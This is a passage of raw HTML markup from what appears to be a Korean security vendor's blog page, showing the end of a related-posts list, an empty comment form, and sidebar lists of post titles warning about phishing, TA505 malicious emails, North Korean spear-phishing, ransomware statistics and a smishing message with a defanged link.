22.9115C187.326 23.3123 188.208 23.9015 188.949 24.645C190.473 26.2047 191.339 28.2908 191.368 30.4713C191.384 31.5009 191.193 32.5231 190.808 33.478C190.422 34.4328 189.85 35.301 189.124 36.0314C188.4 36.7895 187.533 37.3964 186.573 37.8168C185.612 38.2372 184.578 38.4629 183.53 38.4806H163.153Z" fill="#AEAEAE"/> </svg> </span> </div> </div> <div class="cont_thumb"> <p class="txt_thumb">사용자 PC 정보를 탈취하는 국내 중소기업 사칭 견적 요청 피싱 메일 주의!</p> <p class="thumb_info"> <span class="date">2019.05.13</span> </p> </div> </a> </li> <li> <a href="/2294?category=957259" class="link_thumb thumb_type"> <div class="box_thumb thumb_img" style="background-image:url('https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F99B0553A5CD23E1833')"></div> <div class="box_thumb no_img"> <div class="default_img"> <span class="box_svg"> <svg width="402" height="40" viewBox="0 0 402 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.6085 38.7388C8.6497 38.7485 5.80179 37.6035 3.66035 35.5433C1.51891 33.4831 0.249801 30.7724 0.118425 27.7898C-0.0426807 22.2245 -0.0362364 16.8877 0.118425 10.8071C0.273086 5.01339 5.54446 0.00650245 11.37 0H48.1175V7.75092H7.74777V15.4945H48.1469V23.2433H7.76711V30.9911H48.1469V38.7388C48.1469 38.7388 14.5673 38.7292 11.6085 38.7388Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M99.8923 0V7.74777L61.9729 7.75847V15.5062L74.1766 15.4999V15.4961L81.3733 15.4961L82.4397 15.4955V15.496C83.3227 15.4957 84.0598 15.494 84.9039 15.4921C86.2155 15.489 87.7854 15.4854 90.5623 15.4854C93.6335 15.4378 96.6572 16.7314 98.8624 18.8761C101.068 21.0209 102.333 23.9565 102.381 27.0372C102.428 30.1179 101.253 33.0913 99.1153 35.3033C96.9771 37.5153 94.0589 38.6811 90.9877 38.7287L56.4473 38.7394V30.9916L94.6434 30.9809V23.2332L82.4397 23.2396V23.2433L75.2412 23.2433L74.1766 23.2439V23.2434C73.2936 23.2437 72.5565 23.2454 71.7124 23.2474C70.4008 23.2504 68.8309 23.254 66.054 23.254C62.9828 23.3016 59.9592 22.008 57.7539 19.8633C55.5487 17.7185 54.2832 14.7829 54.2358 11.7022C54.1883 8.62153 55.3629 5.64812 57.501 3.4361C59.6392 1.22408 62.5574 0.0582854 65.6286 0.0107075L99.8923 0Z" fill="#AEAEAE"/> <path d="M127.563 38.8772V7.74777H107.641V0L155.788 0V7.74777H135.865V38.8772H127.563Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M370.781 11.5547H376.897L385.393 22.7928L393.847 11.5547H400.004L388.028 27.2273V38.5035H382.636V27.2691L370.781 11.5547Z" fill="#AEAEAE"/> <path d="M368.103 16.9475H356.773V38.5073H351.369V16.9475H340.062V11.5547H368.103V16.9475Z" fill="#AEAEAE"/> <path d="M335.545 38.5073H330.156V11.5547H335.545V38.5073Z" fill="#AEAEAE"/> <path d="M323.853 38.5073H318.574V30.2888H300.612V38.5073H295.234V11.5547H318.487C320.01 11.679 321.421 12.4026 322.411 13.5665C323.37 14.7155 323.879 16.174 323.841 17.6701V23.0857C323.838 24.1214 323.566 25.1385 323.05 26.0369C322.521 26.9278 321.738 27.6413 320.803 28.0868C321.739 28.5474 322.52 29.2719 323.05 30.1709C323.575 31.0653 323.825 32.0943 323.769 33.1297L323.853 38.5073ZM318.574 24.8998V16.9475H300.612V24.8998H318.574Z" fill="#AEAEAE"/> <path d="M289.175 30.4675C289.182 32.5177 288.401 34.4922 286.992 35.982C285.579 37.4884 283.642 38.3961 281.58 38.5187H269.57C265.611 38.4122 262.223 34.6737 262.219 30.6348V11.5547H267.608V33.1297H283.779V11.5547H289.164L289.175 30.4675Z" fill="#AEAEAE"/> <path d="M237.141 38.5073C235.107 38.5148 233.149 37.7306 231.683 36.3205C230.21 34.9113 229.34 32.9871 229.253 30.9505C229.143 26.9496 229.147 22.9069 229.253 18.9441C229.36 14.9813 232.976 11.5623 236.977 11.5547H256.111V16.9475H234.562V33.1297H256.111V38.5187L237.141 38.5073Z" fill="#AEAEAE"/> <path d="M204.122 38.5035C202.093 38.5093 200.142 37.7265 198.68 36.3205C197.211 34.9068 196.343 32.9829 196.253 30.9467C196.143 26.9458 196.147 22.9031 196.253 18.9441C196.36 14.9851 199.969 11.5585 203.958 11.5547H223.126V16.9437H201.562V22.3327H223.126V27.7255H201.562V33.1145H223.126V38.5035H204.122Z" fill="#AEAEAE"/> <path d="M163.153 38.4806V33.1031H186.055V27.6989H169.919C167.897 27.7442 165.936 27.0086 164.442 25.6452C162.951 24.2166 162.048 22.2823 161.909 20.222C161.771 18.1517 162.401 16.1033 163.678 14.4679C164.947 12.88 166.776 11.8377 168.789 11.5547C168.926 11.5547 169.067 11.5547 169.2 11.5547H190.117V16.9209H167.298V22.3099H183.294C184.344 22.3062 185.385 22.5107 186.355 22.9115C187.326 23.3123 188.208 23.9015 188.949 24.645C190.473 26.2047 191.339 28.2908 191.368 30.4713C191.384 31.5009 191.193 32.5231 190.808 33.478C190.422 34.4328 189.85 35.301 189.124 36.0314C188.4 36.7895 187.533 37.3964 186.573 37.8168C185.612 38.2372 184.578 38.4629 183.53 38.4806H163.153Z" fill="#AEAEAE"/> </svg> </span> </div> </div> <div class="cont_thumb"> <p class="txt_thumb">TA505조직, 또다시 엑셀 문서로 위장한 악성 이메일 유포해</p> <p class="thumb_info"> <span class="date">2019.05.08</span> </p> </div> </a> </li> </ul> </div> <!-- //관련 글 --> <!-- 댓글 --> <div class="box_comment"> <h3 class="blind">댓글 영역</h3> <div class="comment_info"> <a href="#rp" onclick="" class="reply_events"> <button type="button" class="btn_info_comment">댓글 <em class="txt_style"> <span id="commentCount2299_0">0</span> </em>개</button></a> <button type="button" class="btn_info_write" onclick="$('.box_comment_write textarea').focus();"><span class="txt_style">댓글 쓰기</span></button> </div> <div data-tistory-react-app="Namecard"></div><div id="entry2299Comment"> <div class="comment_area"> <button type="button" class="btn_more btn_replymore" style="display:none;">이전 댓글 더보기</button> <div class="box_comment_list"> <ul> </ul> </div> <!-- //box_comment_list --> <form method="post" action="/comment/add/2299" onsubmit="return false" style="margin: 0"> <form method="post"> <div class="box_comment_write"> <!-- register_area --> <div class="register_area"> <!-- form_guest --> <div class="form_guest"> <!-- name --> <div class="box_inp"> <div class="inner_inp"> <input type="text" name="name" value="" title="이름" placeholder="이름" class="inp_comment inp_name" /> </div> </div> <!-- password --> <div class="box_inp"> <div class="inner_inp"> <input type="password" name="password" value="" title="비밀번호" maxlength="12" placeholder="비밀번호" class="inp_comment inp_password" /> </div> </div> </div> <!-- //form_guest --> <!-- secret --> <div class="form_secret"> <input id="commentSecret" type="checkbox" name="secret"> <label for="commentSecret" class="label_secret">비밀글 <i class="icon-check"></i></label> </div> <!-- form_cont --> <div class="form_cont"> <textarea id="comment" name="comment" placeholder="댓글을 입력해주세요."></textarea> </div> <!-- button-form --> <button type="button" class="btn_register" onclick="addComment(this, 2299); return false;">댓글 남기기</button> </div> <!-- //register_area --> </div> </form> </form> </div> </div> <script type="text/javascript">loadedComments[2299]=true; findFragmentAndHighlight(2299);</script> </div> <!-- //댓글 --> </div> </div> </div> <!-- page 디자인 --> <!-- // page 디자인 --> <!-- sidebar --> <div id="sidebar" class="sidebar"> <h2 class="blind">추가 정보</h2> <div class="section_area"> <h3 class="tit_section">인기글</h3> <ol class="list_article list_sub list_sidebar"> <li> <a href="/1074" class="link_thumb"> <div class="box_thumb thumb_img" style="background-image:url('https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Ft1.daumcdn.net%2Fcfile%2Ftistory%2F263A003F593DE4EF0B')"> <span class="item_count">-</span> </div> <div class="box_thumb no_img"> <div class="default_img"> <span class="box_svg"> <svg width="402" height="40" viewBox="0 0 402 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.6085 38.7388C8.6497 38.7485 5.80179 37.6035 3.66035 35.5433C1.51891 33.4831 0.249801 30.7724 0.118425 27.7898C-0.0426807 22.2245 -0.0362364 16.8877 0.118425 10.8071C0.273086 5.01339 5.54446 0.00650245 11.37 0H48.1175V7.75092H7.74777V15.4945H48.1469V23.2433H7.76711V30.9911H48.1469V38.7388C48.1469 38.7388 14.5673 38.7292 11.6085 38.7388Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M99.8923 0V7.74777L61.9729 7.75847V15.5062L74.1766 15.4999V15.4961L81.3733 15.4961L82.4397 15.4955V15.496C83.3227 15.4957 84.0598 15.494 84.9039 15.4921C86.2155 15.489 87.7854 15.4854 90.5623 15.4854C93.6335 15.4378 96.6572 16.7314 98.8624 18.8761C101.068 21.0209 102.333 23.9565 102.381 27.0372C102.428 30.1179 101.253 33.0913 99.1153 35.3033C96.9771 37.5153 94.0589 38.6811 90.9877 38.7287L56.4473 38.7394V30.9916L94.6434 30.9809V23.2332L82.4397 23.2396V23.2433L75.2412 23.2433L74.1766 23.2439V23.2434C73.2936 23.2437 72.5565 23.2454 71.7124 23.2474C70.4008 23.2504 68.8309 23.254 66.054 23.254C62.9828 23.3016 59.9592 22.008 57.7539 19.8633C55.5487 17.7185 54.2832 14.7829 54.2358 11.7022C54.1883 8.62153 55.3629 5.64812 57.501 3.4361C59.6392 1.22408 62.5574 0.0582854 65.6286 0.0107075L99.8923 0Z" fill="#AEAEAE"/> <path d="M127.563 38.8772V7.74777H107.641V0L155.788 0V7.74777H135.865V38.8772H127.563Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M370.781 11.5547H376.897L385.393 22.7928L393.847 11.5547H400.004L388.028 27.2273V38.5035H382.636V27.2691L370.781 11.5547Z" fill="#AEAEAE"/> <path d="M368.103 16.9475H356.773V38.5073H351.369V16.9475H340.062V11.5547H368.103V16.9475Z" fill="#AEAEAE"/> <path d="M335.545 38.5073H330.156V11.5547H335.545V38.5073Z" fill="#AEAEAE"/> <path d="M323.853 38.5073H318.574V30.2888H300.612V38.5073H295.234V11.5547H318.487C320.01 11.679 321.421 12.4026 322.411 13.5665C323.37 14.7155 323.879 16.174 323.841 17.6701V23.0857C323.838 24.1214 323.566 25.1385 323.05 26.0369C322.521 26.9278 321.738 27.6413 320.803 28.0868C321.739 28.5474 322.52 29.2719 323.05 30.1709C323.575 31.0653 323.825 32.0943 323.769 33.1297L323.853 38.5073ZM318.574 24.8998V16.9475H300.612V24.8998H318.574Z" fill="#AEAEAE"/> <path d="M289.175 30.4675C289.182 32.5177 288.401 34.4922 286.992 35.982C285.579 37.4884 283.642 38.3961 281.58 38.5187H269.57C265.611 38.4122 262.223 34.6737 262.219 30.6348V11.5547H267.608V33.1297H283.779V11.5547H289.164L289.175 30.4675Z" fill="#AEAEAE"/> <path d="M237.141 38.5073C235.107 38.5148 233.149 37.7306 231.683 36.3205C230.21 34.9113 229.34 32.9871 229.253 30.9505C229.143 26.9496 229.147 22.9069 229.253 18.9441C229.36 14.9813 232.976 11.5623 236.977 11.5547H256.111V16.9475H234.562V33.1297H256.111V38.5187L237.141 38.5073Z" fill="#AEAEAE"/> <path d="M204.122 38.5035C202.093 38.5093 200.142 37.7265 198.68 36.3205C197.211 34.9068 196.343 32.9829 196.253 30.9467C196.143 26.9458 196.147 22.9031 196.253 18.9441C196.36 14.9851 199.969 11.5585 203.958 11.5547H223.126V16.9437H201.562V22.3327H223.126V27.7255H201.562V33.1145H223.126V38.5035H204.122Z" fill="#AEAEAE"/> <path d="M163.153 38.4806V33.1031H186.055V27.6989H169.919C167.897 27.7442 165.936 27.0086 164.442 25.6452C162.951 24.2166 162.048 22.2823 161.909 20.222C161.771 18.1517 162.401 16.1033 163.678 14.4679C164.947 12.88 166.776 11.8377 168.789 11.5547C168.926 11.5547 169.067 11.5547 169.2 11.5547H190.117V16.9209H167.298V22.3099H183.294C184.344 22.3062 185.385 22.5107 186.355 22.9115C187.326 23.3123 188.208 23.9015 188.949 24.645C190.473 26.2047 191.339 28.2908 191.368 30.4713C191.384 31.5009 191.193 32.5231 190.808 33.478C190.422 34.4328 189.85 35.301 189.124 36.0314C188.4 36.7895 187.533 37.3964 186.573 37.8168C185.612 38.2372 184.578 38.4629 183.53 38.4806H163.153Z" fill="#AEAEAE"/> </svg> </span> </div> <span class="item_count">-</span> </div> <div class="cont_thumb"> <strong class="txt_thumb">새로 산 SSD가 인식이 안될 때 대처하는 꿀팁!</strong> <p class="txt_date">2017.04.25 09:34</p> </div> </a> </li> <li> <a href="/5526" class="link_thumb"> <div class="box_thumb thumb_img" style="background-image:url('https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fc8LLLx%2FbtsMgO04YXL%2FkNTIWvdLbYPQMnsv7RPMLK%2Fimg.png')"> <span class="item_count">-</span> </div> <div class="box_thumb no_img"> <div class="default_img"> <span class="box_svg"> <svg width="402" height="40" viewBox="0 0 402 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.6085 38.7388C8.6497 38.7485 5.80179 37.6035 3.66035 35.5433C1.51891 33.4831 0.249801 30.7724 0.118425 27.7898C-0.0426807 22.2245 -0.0362364 16.8877 0.118425 10.8071C0.273086 5.01339 5.54446 0.00650245 11.37 0H48.1175V7.75092H7.74777V15.4945H48.1469V23.2433H7.76711V30.9911H48.1469V38.7388C48.1469 38.7388 14.5673 38.7292 11.6085 38.7388Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M99.8923 0V7.74777L61.9729 7.75847V15.5062L74.1766 15.4999V15.4961L81.3733 15.4961L82.4397 15.4955V15.496C83.3227 15.4957 84.0598 15.494 84.9039 15.4921C86.2155 15.489 87.7854 15.4854 90.5623 15.4854C93.6335 15.4378 96.6572 16.7314 98.8624 18.8761C101.068 21.0209 102.333 23.9565 102.381 27.0372C102.428 30.1179 101.253 33.0913 99.1153 35.3033C96.9771 37.5153 94.0589 38.6811 90.9877 38.7287L56.4473 38.7394V30.9916L94.6434 30.9809V23.2332L82.4397 23.2396V23.2433L75.2412 23.2433L74.1766 23.2439V23.2434C73.2936 23.2437 72.5565 23.2454 71.7124 23.2474C70.4008 23.2504 68.8309 23.254 66.054 23.254C62.9828 23.3016 59.9592 22.008 57.7539 19.8633C55.5487 17.7185 54.2832 14.7829 54.2358 11.7022C54.1883 8.62153 55.3629 5.64812 57.501 3.4361C59.6392 1.22408 62.5574 0.0582854 65.6286 0.0107075L99.8923 0Z" fill="#AEAEAE"/> <path d="M127.563 38.8772V7.74777H107.641V0L155.788 0V7.74777H135.865V38.8772H127.563Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M370.781 11.5547H376.897L385.393 22.7928L393.847 11.5547H400.004L388.028 27.2273V38.5035H382.636V27.2691L370.781 11.5547Z" fill="#AEAEAE"/> <path d="M368.103 16.9475H356.773V38.5073H351.369V16.9475H340.062V11.5547H368.103V16.9475Z" fill="#AEAEAE"/> <path d="M335.545 38.5073H330.156V11.5547H335.545V38.5073Z" fill="#AEAEAE"/> <path d="M323.853 38.5073H318.574V30.2888H300.612V38.5073H295.234V11.5547H318.487C320.01 11.679 321.421 12.4026 322.411 13.5665C323.37 14.7155 323.879 16.174 323.841 17.6701V23.0857C323.838 24.1214 323.566 25.1385 323.05 26.0369C322.521 26.9278 321.738 27.6413 320.803 28.0868C321.739 28.5474 322.52 29.2719 323.05 30.1709C323.575 31.0653 323.825 32.0943 323.769 33.1297L323.853 38.5073ZM318.574 24.8998V16.9475H300.612V24.8998H318.574Z" fill="#AEAEAE"/> <path d="M289.175 30.4675C289.182 32.5177 288.401 34.4922 286.992 35.982C285.579 37.4884 283.642 38.3961 281.58 38.5187H269.57C265.611 38.4122 262.223 34.6737 262.219 30.6348V11.5547H267.608V33.1297H283.779V11.5547H289.164L289.175 30.4675Z" fill="#AEAEAE"/> <path d="M237.141 38.5073C235.107 38.5148 233.149 37.7306 231.683 36.3205C230.21 34.9113 229.34 32.9871 229.253 30.9505C229.143 26.9496 229.147 22.9069 229.253 18.9441C229.36 14.9813 232.976 11.5623 236.977 11.5547H256.111V16.9475H234.562V33.1297H256.111V38.5187L237.141 38.5073Z" fill="#AEAEAE"/> <path d="M204.122 38.5035C202.093 38.5093 200.142 37.7265 198.68 36.3205C197.211 34.9068 196.343 32.9829 196.253 30.9467C196.143 26.9458 196.147 22.9031 196.253 18.9441C196.36 14.9851 199.969 11.5585 203.958 11.5547H223.126V16.9437H201.562V22.3327H223.126V27.7255H201.562V33.1145H223.126V38.5035H204.122Z" fill="#AEAEAE"/> <path d="M163.153 38.4806V33.1031H186.055V27.6989H169.919C167.897 27.7442 165.936 27.0086 164.442 25.6452C162.951 24.2166 162.048 22.2823 161.909 20.222C161.771 18.1517 162.401 16.1033 163.678 14.4679C164.947 12.88 166.776 11.8377 168.789 11.5547C168.926 11.5547 169.067 11.5547 169.2 11.5547H190.117V16.9209H167.298V22.3099H183.294C184.344 22.3062 185.385 22.5107 186.355 22.9115C187.326 23.3123 188.208 23.9015 188.949 24.645C190.473 26.2047 191.339 28.2908 191.368 30.4713C191.384 31.5009 191.193 32.5231 190.808 33.478C190.422 34.4328 189.85 35.301 189.124 36.0314C188.4 36.7895 187.533 37.3964 186.573 37.8168C185.612 38.2372 184.578 38.4629 183.53 38.4806H163.153Z" fill="#AEAEAE"/> </svg> </span> </div> <span class="item_count">-</span> </div> <div class="cont_thumb"> <strong class="txt_thumb">北 해킹 조직, 거래처 업무 메일로 위장한 스피어 피싱 공격 주의!</strong> <p class="txt_date">2025.02.13 18:05</p> </div> </a> </li> <li> <a href="/5522" class="link_thumb"> <div class="box_thumb thumb_img" style="background-image:url('https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FmWSfb%2FbtsMcgvwirU%2Frv4VkAr5tmZE8KyAXEHRr1%2Fimg.png')"> <span class="item_count">-</span> </div> <div class="box_thumb no_img"> <div class="default_img"> <span class="box_svg"> <svg width="402" height="40" viewBox="0 0 402 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.6085 38.7388C8.6497 38.7485 5.80179 37.6035 3.66035 35.5433C1.51891 33.4831 0.249801 30.7724 0.118425 27.7898C-0.0426807 22.2245 -0.0362364 16.8877 0.118425 10.8071C0.273086 5.01339 5.54446 0.00650245 11.37 0H48.1175V7.75092H7.74777V15.4945H48.1469V23.2433H7.76711V30.9911H48.1469V38.7388C48.1469 38.7388 14.5673 38.7292 11.6085 38.7388Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M99.8923 0V7.74777L61.9729 7.75847V15.5062L74.1766 15.4999V15.4961L81.3733 15.4961L82.4397 15.4955V15.496C83.3227 15.4957 84.0598 15.494 84.9039 15.4921C86.2155 15.489 87.7854 15.4854 90.5623 15.4854C93.6335 15.4378 96.6572 16.7314 98.8624 18.8761C101.068 21.0209 102.333 23.9565 102.381 27.0372C102.428 30.1179 101.253 33.0913 99.1153 35.3033C96.9771 37.5153 94.0589 38.6811 90.9877 38.7287L56.4473 38.7394V30.9916L94.6434 30.9809V23.2332L82.4397 23.2396V23.2433L75.2412 23.2433L74.1766 23.2439V23.2434C73.2936 23.2437 72.5565 23.2454 71.7124 23.2474C70.4008 23.2504 68.8309 23.254 66.054 23.254C62.9828 23.3016 59.9592 22.008 57.7539 19.8633C55.5487 17.7185 54.2832 14.7829 54.2358 11.7022C54.1883 8.62153 55.3629 5.64812 57.501 3.4361C59.6392 1.22408 62.5574 0.0582854 65.6286 0.0107075L99.8923 0Z" fill="#AEAEAE"/> <path d="M127.563 38.8772V7.74777H107.641V0L155.788 0V7.74777H135.865V38.8772H127.563Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M370.781 11.5547H376.897L385.393 22.7928L393.847 11.5547H400.004L388.028 27.2273V38.5035H382.636V27.2691L370.781 11.5547Z" fill="#AEAEAE"/> <path d="M368.103 16.9475H356.773V38.5073H351.369V16.9475H340.062V11.5547H368.103V16.9475Z" fill="#AEAEAE"/> <path d="M335.545 38.5073H330.156V11.5547H335.545V38.5073Z" fill="#AEAEAE"/> <path d="M323.853 38.5073H318.574V30.2888H300.612V38.5073H295.234V11.5547H318.487C320.01 11.679 321.421 12.4026 322.411 13.5665C323.37 14.7155 323.879 16.174 323.841 17.6701V23.0857C323.838 24.1214 323.566 25.1385 323.05 26.0369C322.521 26.9278 321.738 27.6413 320.803 28.0868C321.739 28.5474 322.52 29.2719 323.05 30.1709C323.575 31.0653 323.825 32.0943 323.769 33.1297L323.853 38.5073ZM318.574 24.8998V16.9475H300.612V24.8998H318.574Z" fill="#AEAEAE"/> <path d="M289.175 30.4675C289.182 32.5177 288.401 34.4922 286.992 35.982C285.579 37.4884 283.642 38.3961 281.58 38.5187H269.57C265.611 38.4122 262.223 34.6737 262.219 30.6348V11.5547H267.608V33.1297H283.779V11.5547H289.164L289.175 30.4675Z" fill="#AEAEAE"/> <path d="M237.141 38.5073C235.107 38.5148 233.149 37.7306 231.683 36.3205C230.21 34.9113 229.34 32.9871 229.253 30.9505C229.143 26.9496 229.147 22.9069 229.253 18.9441C229.36 14.9813 232.976 11.5623 236.977 11.5547H256.111V16.9475H234.562V33.1297H256.111V38.5187L237.141 38.5073Z" fill="#AEAEAE"/> <path d="M204.122 38.5035C202.093 38.5093 200.142 37.7265 198.68 36.3205C197.211 34.9068 196.343 32.9829 196.253 30.9467C196.143 26.9458 196.147 22.9031 196.253 18.9441C196.36 14.9851 199.969 11.5585 203.958 11.5547H223.126V16.9437H201.562V22.3327H223.126V27.7255H201.562V33.1145H223.126V38.5035H204.122Z" fill="#AEAEAE"/> <path d="M163.153 38.4806V33.1031H186.055V27.6989H169.919C167.897 27.7442 165.936 27.0086 164.442 25.6452C162.951 24.2166 162.048 22.2823 161.909 20.222C161.771 18.1517 162.401 16.1033 163.678 14.4679C164.947 12.88 166.776 11.8377 168.789 11.5547C168.926 11.5547 169.067 11.5547 169.2 11.5547H190.117V16.9209H167.298V22.3099H183.294C184.344 22.3062 185.385 22.5107 186.355 22.9115C187.326 23.3123 188.208 23.9015 188.949 24.645C190.473 26.2047 191.339 28.2908 191.368 30.4713C191.384 31.5009 191.193 32.5231 190.808 33.478C190.422 34.4328 189.85 35.301 189.124 36.0314C188.4 36.7895 187.533 37.3964 186.573 37.8168C185.612 38.2372 184.578 38.4629 183.53 38.4806H163.153Z" fill="#AEAEAE"/> </svg> </span> </div> <span class="item_count">-</span> </div> <div class="cont_thumb"> <strong class="txt_thumb">2024년 4분기 알약 랜섬웨어 행위기반 차단 건수 총 61,780건!</strong> <p class="txt_date">2025.02.10 10:29</p> </div> </a> </li> <li> <a href="/5478" class="link_thumb"> <div class="box_thumb thumb_img" style="background-image:url('https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbTcNKO%2FbtsKtqT4lys%2F1xoYx5HZTZVFskAndZ5Ew1%2Fimg.png')"> <span class="item_count">-</span> </div> <div class="box_thumb no_img"> <div class="default_img"> <span class="box_svg"> <svg width="402" height="40" viewBox="0 0 402 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.6085 38.7388C8.6497 38.7485 5.80179 37.6035 3.66035 35.5433C1.51891 33.4831 0.249801 30.7724 0.118425 27.7898C-0.0426807 22.2245 -0.0362364 16.8877 0.118425 10.8071C0.273086 5.01339 5.54446 0.00650245 11.37 0H48.1175V7.75092H7.74777V15.4945H48.1469V23.2433H7.76711V30.9911H48.1469V38.7388C48.1469 38.7388 14.5673 38.7292 11.6085 38.7388Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M99.8923 0V7.74777L61.9729 7.75847V15.5062L74.1766 15.4999V15.4961L81.3733 15.4961L82.4397 15.4955V15.496C83.3227 15.4957 84.0598 15.494 84.9039 15.4921C86.2155 15.489 87.7854 15.4854 90.5623 15.4854C93.6335 15.4378 96.6572 16.7314 98.8624 18.8761C101.068 21.0209 102.333 23.9565 102.381 27.0372C102.428 30.1179 101.253 33.0913 99.1153 35.3033C96.9771 37.5153 94.0589 38.6811 90.9877 38.7287L56.4473 38.7394V30.9916L94.6434 30.9809V23.2332L82.4397 23.2396V23.2433L75.2412 23.2433L74.1766 23.2439V23.2434C73.2936 23.2437 72.5565 23.2454 71.7124 23.2474C70.4008 23.2504 68.8309 23.254 66.054 23.254C62.9828 23.3016 59.9592 22.008 57.7539 19.8633C55.5487 17.7185 54.2832 14.7829 54.2358 11.7022C54.1883 8.62153 55.3629 5.64812 57.501 3.4361C59.6392 1.22408 62.5574 0.0582854 65.6286 0.0107075L99.8923 0Z" fill="#AEAEAE"/> <path d="M127.563 38.8772V7.74777H107.641V0L155.788 0V7.74777H135.865V38.8772H127.563Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M370.781 11.5547H376.897L385.393 22.7928L393.847 11.5547H400.004L388.028 27.2273V38.5035H382.636V27.2691L370.781 11.5547Z" fill="#AEAEAE"/> <path d="M368.103 16.9475H356.773V38.5073H351.369V16.9475H340.062V11.5547H368.103V16.9475Z" fill="#AEAEAE"/> <path d="M335.545 38.5073H330.156V11.5547H335.545V38.5073Z" fill="#AEAEAE"/> <path d="M323.853 38.5073H318.574V30.2888H300.612V38.5073H295.234V11.5547H318.487C320.01 11.679 321.421 12.4026 322.411 13.5665C323.37 14.7155 323.879 16.174 323.841 17.6701V23.0857C323.838 24.1214 323.566 25.1385 323.05 26.0369C322.521 26.9278 321.738 27.6413 320.803 28.0868C321.739 28.5474 322.52 29.2719 323.05 30.1709C323.575 31.0653 323.825 32.0943 323.769 33.1297L323.853 38.5073ZM318.574 24.8998V16.9475H300.612V24.8998H318.574Z" fill="#AEAEAE"/> <path d="M289.175 30.4675C289.182 32.5177 288.401 34.4922 286.992 35.982C285.579 37.4884 283.642 38.3961 281.58 38.5187H269.57C265.611 38.4122 262.223 34.6737 262.219 30.6348V11.5547H267.608V33.1297H283.779V11.5547H289.164L289.175 30.4675Z" fill="#AEAEAE"/> <path d="M237.141 38.5073C235.107 38.5148 233.149 37.7306 231.683 36.3205C230.21 34.9113 229.34 32.9871 229.253 30.9505C229.143 26.9496 229.147 22.9069 229.253 18.9441C229.36 14.9813 232.976 11.5623 236.977 11.5547H256.111V16.9475H234.562V33.1297H256.111V38.5187L237.141 38.5073Z" fill="#AEAEAE"/> <path d="M204.122 38.5035C202.093 38.5093 200.142 37.7265 198.68 36.3205C197.211 34.9068 196.343 32.9829 196.253 30.9467C196.143 26.9458 196.147 22.9031 196.253 18.9441C196.36 14.9851 199.969 11.5585 203.958 11.5547H223.126V16.9437H201.562V22.3327H223.126V27.7255H201.562V33.1145H223.126V38.5035H204.122Z" fill="#AEAEAE"/> <path d="M163.153 38.4806V33.1031H186.055V27.6989H169.919C167.897 27.7442 165.936 27.0086 164.442 25.6452C162.951 24.2166 162.048 22.2823 161.909 20.222C161.771 18.1517 162.401 16.1033 163.678 14.4679C164.947 12.88 166.776 11.8377 168.789 11.5547C168.926 11.5547 169.067 11.5547 169.2 11.5547H190.117V16.9209H167.298V22.3099H183.294C184.344 22.3062 185.385 22.5107 186.355 22.9115C187.326 23.3123 188.208 23.9015 188.949 24.645C190.473 26.2047 191.339 28.2908 191.368 30.4713C191.384 31.5009 191.193 32.5231 190.808 33.478C190.422 34.4328 189.85 35.301 189.124 36.0314C188.4 36.7895 187.533 37.3964 186.573 37.8168C185.612 38.2372 184.578 38.4629 183.53 38.4806H163.153Z" fill="#AEAEAE"/> </svg> </span> </div> <span class="item_count">-</span> </div> <div class="cont_thumb"> <strong class="txt_thumb">[국제발신][교통24]교통법위반[신호위반]범칙금부가 내용전송되었습니다. 내용확인: hxxp://g**.nb**.work</strong> <p class="txt_date">2024.11.01 15:57</p> </div> </a> </li> </ol> </div> <!-- 인기글 --> <div class="section_area"> <h3 class="tit_section">최신글</h3> <ol class="list_article list_sub list_sidebar list_recent"> <li> <a href="/5530" class="link_thumb"> <div class="box_thumb thumb_img" style="background-image:url('https://img1.daumcdn.net/thumb/R750x0/?scode=mtistory2&fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FHHVy1%2FbtsMmcM8Npt%2FwGV1SeJpLKyqMcRTW984E0%2Fimg.png')"> <span class="item_count">-</span> </div> <div class="box_thumb no_img"> <div class="default_img"> <span class="box_svg"> <svg width="402" height="40" viewBox="0 0 402 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M11.6085 38.7388C8.6497 38.7485 5.80179 37.6035 3.66035 35.5433C1.51891 33.4831 0.249801 30.7724 0.118425 27.7898C-0.0426807 22.2245 -0.0362364 16.8877 0.118425 10.8071C0.273086 5.01339 5.54446 0.00650245 11.37 0H48.1175V7.75092H7.74777V15.4945H48.1469V23.2433H7.76711V30.9911H48.1469V38.7388C48.1469 38.7388 14.5673 38.7292 11.6085 38.7388Z" fill="#AEAEAE"/> <path fill-rule="evenodd" clip-rule="evenodd" d="M99.8923 0V7.74777L61.9729 7.75847V15.5062L74.1766 15.4999V15.4961L81.3733 15.4961L82.4397 15.4955V15.496C83.3227 15.4957 84.0598 15.494 84.9039 15.4921C86.2155 15.489 87.7854 15.4854 90.5623 15.4854C93.6335 15.4378 96.6572 16.7314 98.8624 18.8761C101.068 21.0209 102.333 23.9565 102.381 27.0372C102.428 30.1179 101.253 33.0913 